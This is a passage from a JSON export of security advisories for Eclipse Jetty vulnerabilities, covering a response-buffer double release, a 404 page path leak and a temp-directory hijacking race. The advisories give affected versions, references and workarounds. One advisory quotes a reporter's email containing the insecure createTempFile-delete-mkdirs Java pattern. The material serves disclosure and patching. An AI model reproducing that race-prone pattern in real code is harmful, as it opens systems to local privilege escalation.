"9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.3.v20150827", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.3.19.v20170502", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-wfcc-pff6-rgc5/GHSA-wfcc-pff6-rgc5.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.2.22.v20170606" } ] } ], "versions": [ "7.0.0.M0", "7.0.0.M1", "7.0.0.M2", "7.0.0.M3", "7.0.0.M4", "7.0.0.RC0", "7.0.0.RC1", "7.0.0.RC2", "7.0.0.RC3", "7.0.0.RC4", "7.0.0.RC5", "7.0.0.RC6", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.3.v20140905", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.2.21.v20170120", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-wfcc-pff6-rgc5/GHSA-wfcc-pff6-rgc5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-9735" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/issues/1556" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/commit/042f325f1cd6e7891d72c7e668f5947b5457dc02" }, { "type": "WEB", "url": "https://bugs.debian.org/864631" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/36870f6c51f5bc25e6f7bb1fcace0e57e81f1524019b11f466738559@%3Ccommon-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f887a5978f5e4c62b9cfe876336628385cff429e796962649649ec8a@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/05/msg00016.html" }, { "type": "WEB", "url": "https://web.archive.org/web/20170826163336/http://www.securityfocus.com/bid/99104" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" } ], "database_specific": { "cwe_ids": [ "CWE-200", "CWE-203" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T22:00:10Z", "nvd_published_at": "2017-06-16T21:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-x3rh-m7vp-35f2", "published": "2020-08-05T14:52:59Z", "modified": "2024-03-14T05:49:04.832402Z", "aliases": [ "CVE-2019-17638" ], "summary": "Operation on a Resource after Expiration or Release in Jetty Server", "details": "In Eclipse Jetty, versions 9.4.27.v20200227 to 9.4.29.v20200521, in case of too large response headers, Jetty throws an exception to produce an HTTP 431 error. When this happens, the ByteBuffer containing the HTTP response headers is released back to the ByteBufferPool twice. Because of this double release, two threads can acquire the same ByteBuffer from the pool and while thread1 is about to use the ByteBuffer to write response1 data, thread2 fills the ByteBuffer with response2 data. Thread1 then proceeds to write the buffer that now contains response2 data. This results in client1, which issued request1 and expects responses, to see response2 which could contain sensitive data belonging to client2 (HTTP session ids, authentication credentials, etc.).", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.27" }, { "fixed": "9.4.30.v20200611" } ] } ], "versions": [ "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.30.v20200610", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/08/GHSA-x3rh-m7vp-35f2/GHSA-x3rh-m7vp-35f2.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-17638" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/issues/4936" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/commit/ff8ae56fa939c3477a0cdd1ff56ce3d902f08fba" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGECLIPSEJETTY-575561" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XE6US6VPZHOWFMUSFGDS5V2DNQPY5MKB" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd98cfd012490cb02caa1a11aaa0cc38bff2d43bcce9b20c2f01063dd@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbe1f230e87ea947593145d0072d0097ddb0af10fee1161db8ca1546c@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra8661fc8c69c647cb06153c1485d48484a833d873f75dfe45937e9de@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9a2cfa56d30782a0c17a5deb951a622d1f5c8de48e1c3b578ffc2a84@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9584c4304c888f651d214341a939bd264ed30c9e3d0d30fe85097ecf@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r81f58591fb4716fb867b36956f30c7c8ad4ab3f23abc952d9d86a2a0@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7fc5f2ed49641ea91c433e3cd0fc3d31c0278c87b82b15c33b881415@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r521168299e023fb075b57afe33d17ff1d09e8a10e0fd8c775ea0e028@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4bdd3f7bb6820a79f9416b6667d718a06d269018619a75ce4b759318@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r378e4cdec15e132575aa1dcb6296ffeff2a896745a8991522e266ad4@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r29073905dc9139d0d7a146595694bf57bb9e35e5ec6aa73eb9c8443a@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=564984" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2020/08/17/1" } ], "database_specific": { "cwe_ids": [ "CWE-672", "CWE-675" ], "github_reviewed": true, "github_reviewed_at": "2020-08-03T20:11:29Z", "nvd_published_at": "2020-07-09T18:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-xc67-hjx6-cgg6", "published": "2019-04-23T16:07:12Z", "modified": "2024-03-14T05:20:28.011920Z", "aliases": [ "CVE-2019-10247" ], "summary": "Installation information leak in Eclipse Jetty", "details": "In Eclipse Jetty version 7.x, 8.x, 9.2.27 and older, 9.3.26 and older, and 9.4.16 and older, the server running on any OS and Jetty version combination will reveal the configured fully qualified directory base resource location on the output of the 404 error for not finding a Context that matches the requested path. The default server behavior on jetty-distribution and jetty-home will include at the end of the Handler tree a DefaultHandler, which is responsible for reporting this 404 error, it presents the various configured contexts as HTML for users to click through to. This produced HTML includes output that contains the configured fully qualified directory base resource location for each context.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "9.2.28.v20190418" } ] } ], "versions": [ "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.27.v20190403", "9.2.3.v20140905", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.2.27.v20190403", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-xc67-hjx6-cgg6/GHSA-xc67-hjx6-cgg6.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.3.0" }, { "fixed": "9.3.27.v20190418" } ] } ], "versions": [ "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.3.v20150827", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.3.26.v20190403", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-xc67-hjx6-cgg6/GHSA-xc67-hjx6-cgg6.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.0" }, { "fixed": "9.4.17.v20190418" } ] } ], "versions": [ "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.16.v20190411", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-xc67-hjx6-cgg6/GHSA-xc67-hjx6-cgg6.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10247" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4949" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190509-0003" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/05/msg00016.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ac51944aef91dd5006b8510b0bef337adaccfe962fb90e7af9c22db4@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=546577" } ], "database_specific": { "cwe_ids": [ "CWE-200", "CWE-213" ], "github_reviewed": true, "github_reviewed_at": "2019-04-23T16:04:31Z", "nvd_published_at": "2019-04-22T20:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g3wg-6mcf-8jj6", "published": "2020-11-04T17:50:24Z", "modified": "2024-03-13T05:33:39.122153Z", "aliases": [ "CVE-2020-27216" ], "related": [ "CVE-2020-27216" ], "summary": "Local Temp Directory Hijacking Vulnerability", "details": "### Impact\nOn Unix like systems, the system's temporary directory is shared between all users on that system. A collocated user can observe the process of creating a temporary sub directory in the shared temporary directory and race to complete the creation of the temporary subdirectory. If the attacker wins the race then they will have read and write permission to the subdirectory used to unpack web applications, including their WEB-INF/lib jar files and JSP files. If any code is ever executed out of this temporary directory, this can lead to a local privilege escalation vulnerability.\n\nAdditionally, any user code uses of [WebAppContext::getTempDirectory](https://www.eclipse.org/jetty/javadoc/9.4.31.v20200723/org/eclipse/jetty/webapp/WebAppContext.html#getTempDirectory()) would similarly be vulnerable.\n\nAdditionally, any user application code using the `ServletContext` attribute for the tempdir will also be impacted.\nSee: https://javaee.github.io/javaee-spec/javadocs/javax/servlet/ServletContext.html#TEMPDIR\n\nFor example:\n```java\nimport java.io.File;\nimport java.io.IOException;\nimport javax.servlet.ServletContext;\nimport javax.servlet.ServletException;\nimport javax.servlet.http.HttpServlet;\nimport javax.servlet.http.HttpServletRequest;\nimport javax.servlet.http.HttpServletResponse;\n\npublic class ExampleServlet extends HttpServlet {\n @Override\n protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {\n File tempDir = (File)getServletContext().getAttribute(ServletContext.TEMPDIR); // Potentially compromised\n // do something with that temp dir\n }\n}\n```\n\nExample: The JSP library itself will use the container temp directory for compiling the JSP source into Java classes before executing them.\n\n### CVSSv3.1 Evaluation\n\nThis vulnerability has been calculated to have a [CVSSv3.1 score of 7.8/10 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\u0026version=3.1)\n\n### Patches\nFixes were applied to the 9.4.x branch with:\n- https://github.com/eclipse/jetty.project/commit/53e0e0e9b25a6309bf24ee3b10984f4145701edb\n- https://github.com/eclipse/jetty.project/commit/9ad6beb80543b392c91653f6bfce233fc75b9d5f\n\nThese will be included in releases: 9.4.33, 10.0.0.beta3, 11.0.0.beta3\n\n### Workarounds\n\nA work around is to set a temporary directory, either for the server or the context, to a directory outside of the shared temporary file system.\nFor recent releases, a temporary directory can be created simple by creating a directory called `work` in the ${jetty.base} directory (the parent directory of the `webapps` directory).\nAlternately the java temporary directory can be set with the System Property `java.io.tmpdir`. A more detailed description of how jetty selects a temporary directory is below.\n\nThe Jetty search order for finding a temporary directory is as follows:\n\n1. If the [`WebAppContext` has a temp directory specified](https://www.eclipse.org/jetty/javadoc/current/org/eclipse/jetty/webapp/WebAppContext.html#setTempDirectory(java.io.File)), use it.\n2. If the `ServletContext` has the `javax.servlet.context.tempdir` attribute set, and if directory exists, use it.\n3. If a `${jetty.base}/work` directory exists, use it (since Jetty 9.1)\n4. If a `ServletContext` has the `org.eclipse.jetty.webapp.basetempdir` attribute set, and if the directory exists, use it.\n5. Use `System.getProperty(\"java.io.tmpdir\")` and use it.\n\nJetty will end traversal at the first successful step.\nTo mitigate this vulnerability the directory must be set to one that is not writable by an attacker. To avoid information leakage, the directory should also not be readable by an attacker.\n\n#### Setting a Jetty server temporary directory.\n\nChoices 3 and 5 apply to the server level, and will impact all deployed webapps on the server.\n\nFor choice 3 just create that work directory underneath your `${jetty.base}` and restart Jetty.\n\nFor choice 5, just specify your own `java.io.tmpdir` when you start the JVM for Jetty.\n\n``` shell\n[jetty-distribution]$ java -Djava.io.tmpdir=/var/web/work -jar start.jar\n```\n\n#### Setting a Context specific temporary directory.\n\nThe rest of the choices require you to configure the context for that deployed webapp (seen as `${jetty.base}/webapps/\u003ccontext\u003e.xml`)\n\nExample (excluding the DTD which is version specific):\n\n``` xml\n\u003cConfigure class=\"org.eclipse.jetty.webapp.WebAppContext\"\u003e\n \u003cSet name=\"contextPath\"\u003e\u003cProperty name=\"foo\"/\u003e\u003c/Set\u003e\n \u003cSet name=\"war\"\u003e/var/web/webapps/foo.war\u003c/Set\u003e\n \u003cSet name=\"tempDirectory\"\u003e/var/web/work/foo\u003c/Set\u003e\n\u003c/Configure\u003e\n```\n\n### References\n \n - https://github.com/eclipse/jetty.project/issues/5451\n - [CWE-378: Creation of Temporary File With Insecure Permissions](https://cwe.mitre.org/data/definitions/378.html)\n - [CWE-379: Creation of Temporary File in Directory with Insecure Permissions](https://cwe.mitre.org/data/definitions/379.html)\n - [CodeQL Query PR To Detect Similar Vulnerabilities](https://github.com/github/codeql/pull/4473)\n\n### Similar Vulnerabilities\n\nSimilar, but not the same.\n\n - JUnit 4 - https://github.com/junit-team/junit4/security/advisories/GHSA-269g-pwp5-87pp\n - Google Guava - https://github.com/google/guava/issues/4011\n - Apache Ant - https://nvd.nist.gov/vuln/detail/CVE-2020-1945\n - JetBrains Kotlin Compiler - https://nvd.nist.gov/vuln/detail/CVE-2020-15824\n\n### For more information\n\nThe original report of this vulnerability is below:\n\n\u003e On Thu, 15 Oct 2020 at 21:14, Jonathan Leitschuh \u003cjonathan.leitschuh@gmail.com\u003e wrote:\n\u003e Hi WebTide Security Team,\n\u003e\n\u003e I'm a security researcher writing some custom CodeQL queries to find Local Temporary Directory Hijacking Vulnerabilities. One of my queries flagged an issue in Jetty.\n\u003e\n\u003e https://lgtm.com/query/5615014766184643449/\n\u003e\n\u003e I've recently been looking into security vulnerabilities involving the temporary directory because on unix-like systems, the system temporary directory is shared between all users.\n\u003e There exists a race condition between the deletion of the temporary file and the creation of the directory.\n\u003e\n\u003e ```java\n\u003e // ensure file will always be unique by appending random digits\n\u003e tmpDir = File.createTempFile(temp, \".dir\", parent); // Attacker knows the full path of the file that will be generated\n\u003e // delete the file that was created\n\u003e tmpDir.delete(); // Attacker sees file is deleted and begins a race to create their own directory before Jetty.\n\u003e // and make a directory of the same name\n\u003e // SECURITY VULNERABILITY: Race Condition! - Attacker beats Jetty and now owns this directory\n\u003e tmpDir.mkdirs();\n\u003e ```\n\u003e\n\u003e https://github.com/eclipse/jetty.project/blob/1b59672b7f668b8a421690154b98b4b2b03f254b/jetty-webapp/src/main/java/org/eclipse/jetty/webapp/WebInfConfiguration.java#L511-L518\n\u003e\n\u003e In several cases the `parent` parameter will not be the system temporary directory. However, there is one case where it will be, as the last fallback.\n\u003e\n\u003e\n\u003e https://github.com/eclipse/jetty.project/blob/1b59672b7f668b8a421690154b98b4b2b03f254b/jetty-webapp/src/main/java/org/eclipse/jetty/webapp/WebInfConfiguration.java#L467-L468\n\u003e\n\u003e If any code is ever executed out of this temporary directory, this can lead to a local privilege escalation vulnerability.\n\u003e\n\u003e Would your team be willing to open a GitHub security advisory to continue the discussion and disclosure there? https://github.com/eclipse/jetty.project/security/advisories\n\u003e\n\u003e **This vulnerability disclosure follows Google's [90-day vulnerability disclosure policy](https://www.google.com/about/appsecurity/) (I'm not an employee of Google, I just like their policy). Full disclosure will occur either at the end of the 90-day deadline or whenever a patch is made widely available, whichever occurs first.**\n\u003e\n\u003e Cheers,\n\u003e Jonathan Leitschuh\n\n\n", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-webapp", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-webapp" }, "ranges": [ { "type": "ECOSYSTEM", 